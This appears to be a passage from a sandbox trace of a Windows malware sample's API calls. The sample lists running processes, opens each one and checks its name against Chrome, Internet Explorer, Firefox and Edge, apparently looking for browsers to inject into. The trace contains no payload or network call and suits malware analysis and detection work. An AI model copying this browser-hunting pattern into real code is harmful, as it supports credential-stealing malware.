	[0223.071] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0223.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x55c8
	[0223.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.072] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0223.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.073] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.073] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0223.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.073] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.074] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0223.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x55cc
	[0223.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.075] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0223.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.075] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.075] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0223.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.076] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.076] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0223.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x55d0
	[0223.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.077] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0223.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.077] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.077] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0223.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.078] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0223.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x55d4
	[0223.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.079] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.079] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.079] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.080] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.080] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x55d8
	[0223.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.081] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.082] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.082] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.082] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x55dc
	[0223.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.083] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.084] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.084] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.084] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.085] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x55e0
	[0223.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.085] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.086] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.086] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.087] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.087] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x55e4
	[0223.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.088] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.088] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.088] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.089] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x55e8
	[0223.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.090] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.090] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.090] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.091] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x55ec
	[0223.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.092] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.093] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.093] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.093] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x55f0
	[0223.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.094] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.095] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.095] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.095] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0223.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x55f4
	[0223.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.097] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0223.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.098] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.098] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0223.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.098] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x55f8
	[0223.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.100] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.100] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.101] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.101] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0223.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x55fc
	[0223.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.102] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.103] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.103] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.103] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.104] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5600
	[0223.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.104] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.105] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.105] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.105] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.106] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5604
	[0223.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.106] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.107] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.107] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.108] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.108] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5608
	[0223.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.109] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.109] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.109] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.110] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0223.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x560c
	[0223.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.111] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0223.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.111] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.112] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0223.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.112] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.113] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0223.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5610
	[0223.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.113] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0223.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.114] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.114] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0223.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.114] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0223.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5614
	[0223.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.115] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0223.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.116] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.116] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0223.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.116] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.117] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0223.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0223.117] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0223.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5618
	[0223.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.118] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0223.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.119] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.120] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0223.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.120] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0223.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x561c
	[0223.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.122] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0223.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.122] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.122] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0223.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.145] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.145] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0223.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5620
	[0223.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.147] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0223.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.147] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.148] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0223.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.148] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.148] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0223.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5624
	[0223.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.149] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0223.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.149] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.150] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0223.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.150] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.150] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
